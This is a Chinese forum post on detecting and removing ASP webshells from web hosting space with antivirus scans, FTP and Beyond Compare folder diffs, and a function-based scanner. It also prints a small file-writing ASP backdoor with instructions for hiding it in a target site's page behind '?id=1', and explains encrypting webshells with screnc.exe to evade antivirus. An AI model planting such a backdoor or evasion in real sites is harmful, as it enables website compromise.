 TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。 - t6 p1 R# p- V/ l
4 ]- @$ S y) e/ Z3 ?5 }+ l4 U/ x7 e通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 - f! q% I k/ |. g1 k3 A; l
2 K$ \4 ~& i2 Z
一.技巧1:杀毒软件查杀 & ?% g% e) U- p. L
: O3 u2 ?3 T0 c! a% G9 S一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 * l& r7 \0 c5 N/ U m ] }
! o8 {. ~( f3 E: A; r# k' H7 R
利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 3 O' a# b: x; A) L: I; ]: e& Y$ ]
# d# W" f! `4 D) w6 }+ @二.技巧2:FTP客户端对比
, q1 U1 e |. |# X5 k9 f9 ^& E% {! V: G! J# f2 ]
上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: ) D7 {& z. Y* {) [+ y
: ~ {( x3 ~& [6 B* y. K$ }
screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 ; C0 U* [; R6 G2 Y
. E" A* L/ b# R, A7 L
经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉 0 F8 v4 e" c5 u j- G0 @2 ]8 Z; l
1 d4 o' d( w( c$ J' U# I3 x% R
等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。 + X+ e7 Y2 [! N- y3 v" d' X( o
1 p3 ?0 g3 ~% F; u* F盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 4 c& \5 g+ @: f$ E" C! L! j' J
* ~9 ^ P \0 m
所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 , k0 ], q' c) O/ R0 I+ s
: v$ w0 T6 C2 Z4 v: d) ~
这里以FlashFXP进行操作讲解。 ! d# c- c) z, R. S8 `) ]
5 \; a7 G1 I, o2 `步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
& {8 i9 X \0 ?3 J' P/ `! p T
: q7 [0 A L1 b v步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 ( l1 |- L9 c0 g1 k" e
2 A- R1 I# w0 Q; j
我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。 : h2 o( c' I* }! M1 o4 M% ?2 l
三.技巧3:用Beyond Compare 2进行对比 4 x" }; o0 H: W: ?! V
1 N4 i6 j8 r: z上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下:
4 j' X. p, q z# o! h% ~* B
% J+ }! Z7 E# H$ d( O' r〈% 1 s7 t; \" I: }( v' {# H
, G' r6 C* w& T. O
on error resume next 4 C# t9 \( v9 r; w
4 @* j( n# J1 q9 V1 g$ D' t
id=request("id")
' w! F4 w6 R9 Y7 w# r# j1 I
# m/ ?+ u3 i! D- `# ~6 x' Oif request("id")=1 then 6 E2 O- y; w+ ]6 N: ]6 W. b) b
8 o5 T" ^( n. ?+ A- j# e9 H
testfile=Request.form("name")
) d5 s3 [' h& E2 M# a# u7 e/ q3 t$ O6 C) K. t
msg=Request.form("message")
. `! H- i8 x& B! Z) f- w4 m
0 R% r# |9 U ^# f% C7 d$ @9 d7 ]set fs=server.CreatObject("scripting.filesystemobject") 9 J$ D. W d$ f# [- v( d7 ~) j
0 _+ v! h9 O* Z2 m, r
set thisfile=fs.openTestFile(testfile,8,True,0) 2 N7 w2 X8 a# [1 R2 g& E# b" ^
8 [# ]* }3 W( zthisfile.Writeline(""&msg&"") ) k. o5 r/ w- e
$ d# J/ A+ u! Y, d. D" T g- Sthisfile.close
# A/ f' U) m. p; g; u5 i! }! X
; P! s0 G! V2 g: ?set fs=nothing 7 d4 [% N4 D8 D& I, P/ V3 ~0 y, A4 z
: p; x; V9 r+ y9 r3 ]1 a
%〉
1 K5 ^4 E2 |( S K q7 t0 ~9 L6 N- x7 E/ n" y/ ? Q F: w, h+ ?
〈from method="post" Action="保存"?id=1〉
5 K9 f) z1 }7 `+ b# ?8 ]! W) ?' t- n
〈input type="text" size="20" name="Name" 1 d4 N: o* L0 j" g* @" j
7 u' H2 _$ s0 m y! u; ]8 _4 \; pValue=〈%=server.mappath("XP.ASP")%〉〉
& {9 ^# T1 I$ N* p# B( {
& p2 m4 `$ w% V7 y〈textarea name="Message" class=input〉 . M7 @6 L, b. A' U4 j! L/ e2 i9 z
. J( F" j% x% T' [) j
" A! s9 X; x9 s, l7 @0 @& D〈/textarea〉
# d7 j+ o# f, S9 E6 [; b* B
; ?" J: \# F7 H〈input type="Submit" name="send" Value="生成"
7 h# h8 ~! n- E* q) e( y& t
0 w1 W$ k9 e; T. M+ Gclass=input〉
3 [# N# t2 C- o, C7 k8 b
8 z, X9 x: }9 Q4 R/ z〈/from〉
0 _3 Z: o9 l+ Q6 M9 O, @+ I& c
, c7 W3 R& l/ }! v〈%end if%〉 5 O8 C+ w# A; c m0 Z0 o
4 R) h! i, R8 j- |1 N! ]6 ]1 |* i/ j
注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。 % H2 {% x5 D# }: v. [1 b) t( k( F
0 {- G# m: s& d( l3 W* ?7 f2 O假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。 & J: K3 O4 H' |4 m' S) N) G: ]
M' V( j% _4 t
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
9 }: X, F6 R! Y3 e- D6 z
/ h3 `2 ?0 r5 w3 X* N" L1 S, JBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。* r; |* u. X" ^& E1 |, E
! q# p% d% E, X# c* G
看我来利用它完成渗透性asp木马的查找。
; Y6 q- _$ v \$ V' L7 Q+ U# @1 x0 i9 `1 {5 ~- O$ U- e
步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
5 o0 M6 ]3 w# {6 R$ a% h- R5 o6 A" @6 @' ~2 v" _8 R6 I
步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 ! I* e) n. ~& U8 I7 l% p- ~
5 `& I+ t- c+ g( [0 Q步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧!
4 A* l- p$ T& {9 m k) F& ~8 N6 @- f6 k
) [! G# B8 i6 Y/ H四.技巧4:利用组件性能找asp木马 , f- C% Q( f" x: ]! F
; U* z3 x1 e5 h" w; Y+ ]上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。 ! g2 W8 r. o! M/ |0 {8 w
/ J# Z2 ~' ?7 i3 R" `如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 / d3 }7 P- V2 d
$ O/ o) z& k4 O它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 ! B" { p6 x: I
1 P, y& N( Z( W" Y2 w
使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
# o9 k g! w0 Z3 S& b/ G; O2 a3 L6 ~( f; X! `' U) _
一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 $ s* O2 y1 P: J7 c5 E1 Z
, l6 l. |- N+ h2 c+ [' I大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主